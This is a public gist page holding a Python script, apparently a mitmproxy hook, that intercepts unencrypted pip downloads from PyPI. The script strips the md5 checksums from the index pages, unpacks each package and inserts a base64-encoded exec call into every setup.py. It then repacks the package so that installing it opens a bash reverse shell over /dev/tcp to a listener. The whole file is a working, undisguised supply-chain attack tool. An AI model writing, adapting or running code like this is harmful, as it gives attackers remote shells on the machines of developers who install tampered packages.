public
anonymous / pip_intercept.py
Created

  • Download Gist
pip_intercept.py
Python
File suppressed. Click to show.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 
# -*- coding: utf-8 -*-
#
 
import tempfile
import sys, os
import re
 
LHOST, LPORT = ('127.0.0.1', '4444')
 
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;
           sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))
 
PAYLOAD = PAYLOAD.replace('\n', '')
 
 
def response(context, flow):
    if not 'Content-Type' in flow.response.headers:
        return None
 
    if flow.request.get_url().startswith('http://pypi.python.org/simple/'):
        flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)
 
    if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\
       and flow.request.host == 'pypi.python.org':
 
        tmp_dir = tempfile.mkdtemp()
        os.chdir(tmp_dir)
 
        filename = flow.request.get_path_components()[-1]
 
        open(filename, 'wb').write(flow.response.content)
 
        os.mkdir('extracted')
        os.system('aunpack -X '+tmp_dir+'/extracted '+filename)
 
        os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''
                  '''s".decode("base64"))' ''' %
                  PAYLOAD.encode('base64').replace('\n', ''))
 
        os.chdir('extracted')
        os.system('apack -f ../%s *' % filename)
 
        flow.response.content = open('../%s' % filename, 'rb').read()

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.